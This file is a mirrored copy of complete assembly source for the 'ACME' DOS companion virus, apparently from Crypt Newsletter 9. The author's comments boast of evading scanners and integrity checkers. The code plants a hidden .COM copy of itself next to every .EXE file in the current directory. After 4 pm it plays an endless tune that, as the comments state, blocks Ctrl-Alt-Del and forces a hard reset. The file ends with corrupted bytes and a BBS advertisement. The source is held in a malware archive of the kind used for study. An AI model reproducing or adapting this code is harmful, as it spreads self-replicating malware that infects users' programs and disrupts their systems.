mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
301 lines
10 KiB
NASM
301 lines
10 KiB
NASM
|
; ACME COMPANION VIRUS for Crypt Newsletter 9
|
|||
|
;
|
|||
|
; ACME is a fast and simple companion virus which will create a
|
|||
|
; spawned copy of itself for EVERY .EXE file it can find in the
|
|||
|
; current directory.
|
|||
|
;
|
|||
|
; ACME is ready to assemble using A86. If you recall, an earlier Crypt
|
|||
|
; letter included an A86-only source listing. (Strict TASM/MASM compatible
|
|||
|
; assemblers will need the manual addition of a couple simple declarative
|
|||
|
; statements.) I included ACME in this form so fans of Isaacson's
|
|||
|
; technique can gloat about the code not requiring "red tape." ;-]
|
|||
|
; A86 will assemble ACME directly to a .COMfile virus, no linker
|
|||
|
; necessary.
|
|||
|
;
|
|||
|
; ACME currently eludes all scanners and as a companion virus, openly
|
|||
|
; defies every integrity checker I have in my inventory with the EXCEPTION
|
|||
|
; of Stiller Research's. This issue includes a quality report on
|
|||
|
; Solomon's Toolkit, so it's only fair to state that while the documentation
|
|||
|
; for this product seems to indicate that the developers know what a
|
|||
|
; companion infection is, the software does nothing to protect against
|
|||
|
; it in default mode. ACME flies through the Toolkit, for now. Go figure.
|
|||
|
;
|
|||
|
; ACME will also play a generic ACME-style virus tune late in the
|
|||
|
; afternoon. Those who fancy a musical virus but have never heard one are
|
|||
|
; encouraged to play with ACME. Set your system clock to anytime after
|
|||
|
; 4:00 pm. The musical payload takes up most of the space in this virus,
|
|||
|
; removing it shaves the virus to 242 bytes - nice and small if you like.
|
|||
|
;
|
|||
|
; The virus purist may recognize the root of ACME as a piece of code known
|
|||
|
; as ZENO - a small, single-step companion infector. ZENO's author is
|
|||
|
; thanked, wherever he/she is.
|
|||
|
|
|||
|
|
|||
|
START:
|
|||
|
|
|||
|
jmp VIR_BEGIN ; get going
|
|||
|
|
|||
|
|
|||
|
WILDCARD DB "*.EXE",0
|
|||
|
FILE_EXT DB "COM",0
|
|||
|
FILE_FOUND DB 12 DUP(' '), 0
|
|||
|
FILE_CREATE DB 12 DUP(' '), 0
|
|||
|
SEARCH_ATTRIB DW 17H
|
|||
|
NUM_INFECT DW 0
|
|||
|
MUZIK DW 4304,0006, 4063,0006, 4304,0006, 4063,0006, ;MUZIK - notes/delay
|
|||
|
DW 3043,0006, 4831,0006, 4063,0006, 3043,0006, ;in format xxxx,yyyy
|
|||
|
DW 4304,0006, 4063,0006, 4304,0006, 4063,0006,
|
|||
|
DW 3043,0006, 4831,0006, 4063,0006, 3043,0006,
|
|||
|
DW 4304,0006, 4063,0006, 4304,0006, 4063,0006,
|
|||
|
DW 3043,0006, 4831,0006, 4063,0006, 3043,0006,
|
|||
|
DW 4304,0006, 4063,0006, 4304,0006, 4063,0006,
|
|||
|
DW 3043,0006, 5119,0006, 5423,0006, 3043,0006,
|
|||
|
DW 6087,0020,
|
|||
|
|
|||
|
DW 6087,0006,
|
|||
|
DW 7239,0006, 3619,0006, 4831,0006, 6087,0006
|
|||
|
DW 7670,0006, 7239,0006, 4831,0006, 3619,0006
|
|||
|
|
|||
|
DW 6087,0006, 4063,0006, 3043,0006, 5119,0006
|
|||
|
DW 4831,0006, 6087,0006, 7239,0006, 8126,0006
|
|||
|
DW 6087,0020,
|
|||
|
|
|||
|
DW 4304,0006, 4063,0006, 4304,0006, 4063,0006,
|
|||
|
DW 3043,0006, 4831,0006, 4063,0006, 3043,0006,
|
|||
|
DW 4304,0006, 4063,0006, 4304,0006, 4063,0006,
|
|||
|
DW 3043,0006, 4831,0006, 4063,0006, 3043,0006,
|
|||
|
DW 4304,0006, 4063,0006, 4304,0006, 4063,0006,
|
|||
|
DW 3043,0006, 5119,0006, 5423,0006, 3043,0006,
|
|||
|
DW 6087,0020,
|
|||
|
|
|||
|
DW 6087,0006,
|
|||
|
DW 7239,0006, 3619,0006, 4831,0006, 6087,0006
|
|||
|
DW 7670,0006, 7239,0006, 4831,0006, 3619,0006
|
|||
|
|
|||
|
DW 6087,0006, 4063,0006, 3043,0006, 5119,0006
|
|||
|
DW 4831,0006, 6087,0006, 7239,0006, 8126,0006
|
|||
|
DW 6087,0020,
|
|||
|
|
|||
|
DW 7670,0006, 7239,0006, 4831,0006, 3619,0006
|
|||
|
DW 3043,0006, 3619,0006, 4831,0006, 6087,0006
|
|||
|
DW 3043,0010,
|
|||
|
|
|||
|
DW 4304,0006, 4063,0006, 4304,0006, 4063,0006,
|
|||
|
DW 3043,0006, 4831,0006, 4063,0006, 3043,0006,
|
|||
|
DW 4304,0006, 4063,0006, 4304,0006, 4063,0006,
|
|||
|
DW 3043,0006, 4831,0006, 4063,0006, 3043,0006,
|
|||
|
DW 4304,0006, 4063,0006, 4304,0006, 4063,0006,
|
|||
|
DW 3043,0006, 5119,0006, 5423,0006, 3043,0006,
|
|||
|
DW 6087,0020,
|
|||
|
|
|||
|
DW 7670,0006, 7239,0006, 4831,0006, 3619,0006
|
|||
|
DW 3043,0006, 3619,0006, 4831,0006, 6087,0006
|
|||
|
DW 3043,0010,
|
|||
|
|
|||
|
DW 6087,0006,
|
|||
|
DW 7239,0006, 3619,0006, 4831,0006, 6087,0006
|
|||
|
DW 7670,0006, 7239,0006, 4831,0006, 3619,0006
|
|||
|
|
|||
|
DW 6087,0006, 4063,0006, 3043,0006, 5119,0006
|
|||
|
DW 4831,0006, 6087,0006, 7239,0006, 8126,0006
|
|||
|
DW 6087,0020,
|
|||
|
|
|||
|
DW 0ffffh
|
|||
|
|
|||
|
|
|||
|
|
|||
|
My_Cmd:
|
|||
|
CMD_LEN DB 13
|
|||
|
FILE_CLONE DB 12 DUP (' '), 0
|
|||
|
|
|||
|
;------------------------------------------------------------------;
|
|||
|
Prepare_command:
|
|||
|
cld
|
|||
|
mov di,OFFSET FILE_CLONE
|
|||
|
mov al,0
|
|||
|
mov cx,12
|
|||
|
repne scasb ; find the end of string \0
|
|||
|
|
|||
|
mov al,0Dh ; <CR>
|
|||
|
stosb ; replace \0 with a <CR>
|
|||
|
|
|||
|
mov ax,12 ;store length of the command
|
|||
|
sub ax,cx
|
|||
|
mov CMD_LEN, al
|
|||
|
ret
|
|||
|
|
|||
|
;------------------------------------------------------------------;
|
|||
|
Store_name:
|
|||
|
|
|||
|
mov di,OFFSET FILE_FOUND ;Point to buffer.
|
|||
|
mov si,158 ;stow the file found in buffer
|
|||
|
mov cx,12
|
|||
|
rep movsb
|
|||
|
|
|||
|
mov di,OFFSET FILE_CREATE ;Point to buffer.
|
|||
|
mov si,158
|
|||
|
mov cx,12
|
|||
|
rep movsb
|
|||
|
|
|||
|
cld
|
|||
|
mov di,OFFSET FILE_CREATE
|
|||
|
mov al,'.'
|
|||
|
mov cx,9
|
|||
|
repne scasb ;find the '.'
|
|||
|
|
|||
|
mov si,OFFSET FILE_EXT
|
|||
|
mov cx,3
|
|||
|
rep movsb ;replace the .EXE with .COM
|
|||
|
;from buffer
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
;------------------------------------------------------------------;
|
|||
|
;Does the file exist?
|
|||
|
|
|||
|
Check_file:
|
|||
|
mov dx,OFFSET FILE_CREATE
|
|||
|
mov cx,0
|
|||
|
mov ax,3d00h ; Open file, read only
|
|||
|
int 21h
|
|||
|
|
|||
|
Chk_done:
|
|||
|
ret
|
|||
|
|
|||
|
;------------------------------------------------------------------;
|
|||
|
Infect_file: ;create companion routine
|
|||
|
|
|||
|
mov dx,OFFSET FILE_CREATE ;contains name of "companion"
|
|||
|
mov cx,0
|
|||
|
mov ah,3ch ;construct file
|
|||
|
int 21h
|
|||
|
jc EXIT
|
|||
|
|
|||
|
;Write virus to companion file
|
|||
|
mov bx,ax
|
|||
|
mov cx,(OFFSET END_OF_CODE - OFFSET START) ;virus length
|
|||
|
mov dx,OFFSET START
|
|||
|
mov ah,40h ;write to file function
|
|||
|
int 21h ;do it
|
|||
|
|
|||
|
;Close file
|
|||
|
mov ah,3eh ; ASSUMES bx still has file handle
|
|||
|
int 21h
|
|||
|
|
|||
|
;Change attributes
|
|||
|
mov dx,OFFSET FILE_CREATE ;of created file to
|
|||
|
mov cx,3 ;(1) read only and (2) hidden
|
|||
|
mov ax,4301h
|
|||
|
int 21h
|
|||
|
|
|||
|
ret
|
|||
|
|
|||
|
;------------------------------------------------------------------
|
|||
|
; Read all the directory filenames and store as records in buffer.
|
|||
|
;------------------------------------------------------------------
|
|||
|
|
|||
|
Vir_begin:
|
|||
|
mov ah,02Ch ;DOS get time function
|
|||
|
int 021h
|
|||
|
mov al,ch ;Copy hour into AL
|
|||
|
cbw ;Sign-extend AL into AX
|
|||
|
cmp ax,0010h ;Did the function return 16 (4 pm)?
|
|||
|
jge TOON ;If greater than or equal, muzik!
|
|||
|
|
|||
|
|
|||
|
mov sp,offset STACK_HERE ;move stack down
|
|||
|
mov bx,sp
|
|||
|
add bx,15
|
|||
|
mov cl,4
|
|||
|
shr bx,cl
|
|||
|
mov ah,4ah ;deallocate rest of memory
|
|||
|
int 21h
|
|||
|
|
|||
|
mov di,OFFSET FILE_CLONE ;Point to buffer.
|
|||
|
mov si,OFFSET FILE_FOUND
|
|||
|
mov cx,12
|
|||
|
rep movsb
|
|||
|
|
|||
|
Read_dir: mov dx,OFFSET WILDCARD ;file mask for directory search
|
|||
|
mov cx,SEARCH_ATTRIB
|
|||
|
|
|||
|
mov ah,4Eh ;find the first matching file
|
|||
|
int 21h
|
|||
|
|
|||
|
jc EXIT ;If empty directory, exit
|
|||
|
|
|||
|
Do_file:
|
|||
|
call STORE_NAME
|
|||
|
call CHECK_FILE
|
|||
|
call INFECT_FILE
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Find_next:
|
|||
|
mov ah,4fh ; find next file and keep finding until
|
|||
|
int 21h ; all
|
|||
|
jnz Do_File ; infected
|
|||
|
|
|||
|
Exit:
|
|||
|
|
|||
|
; Run the original program
|
|||
|
call Prepare_command
|
|||
|
mov si, OFFSET MY_CMD
|
|||
|
int 2Eh ; Pass command to command
|
|||
|
; interpreter for execution
|
|||
|
|
|||
|
mov ax,4C00H ; Exit to DOS
|
|||
|
int 21h
|
|||
|
|
|||
|
;-------------------------------------------------------------------
|
|||
|
;This routine enables ACME virus to compel the pc to play the
|
|||
|
;ACME virus song just about the time the clock-watchers are getting
|
|||
|
;ready to leave
|
|||
|
;-------------------------------------------------------------------
|
|||
|
TOON:
|
|||
|
cli ;interrupts off
|
|||
|
mov al,10110110xb ;the number
|
|||
|
out 43h,al ;to send to the speaker
|
|||
|
lea si,MUZIK ;point (si) to the ACME note table
|
|||
|
|
|||
|
TOON2: cld
|
|||
|
lodsw ;load word into ax and increment (si)
|
|||
|
cmp ax,0ffffh ;is it ffff? If so, end of table
|
|||
|
jz GO_MUZIK2 ;so, time to jump into endless loop
|
|||
|
out 42h,al
|
|||
|
mov al,ah
|
|||
|
out 42h,al ;send it next
|
|||
|
in al,61h ;get value to turn on speaker
|
|||
|
or al,00000011xb ;OR the gotten value
|
|||
|
out 61h,al ;now we turn on speaker
|
|||
|
lodsw ;load the repeat loop count into (ax)
|
|||
|
LOOP6:
|
|||
|
mov cx,8000 ;delay count
|
|||
|
LOOP7:
|
|||
|
loop LOOP7 ;do the delay
|
|||
|
dec ax ;decrement repeat count
|
|||
|
jnz LOOP6 ;if not = 0 loop back
|
|||
|
in al,61h ;all done
|
|||
|
and al,11111100xb ;number turns speaker off
|
|||
|
out 61h,al ;send it
|
|||
|
jmp short TOON2 ;now go do next note
|
|||
|
GO_MUZIK2: ;our loop point
|
|||
|
|
|||
|
sti ;enable interrupts
|
|||
|
jmp TOON ;jump back to beginning - this code
|
|||
|
; has the additional advantage of
|
|||
|
;locking out CTRL-ALT-DEL reboot.
|
|||
|
;The user must do a hard reset to recover from ACME.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
END_OF_CODE = $
|
|||
|
|
|||
|
STACK_HERE EQU END_OF_CODE + 512
|
|||
|
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|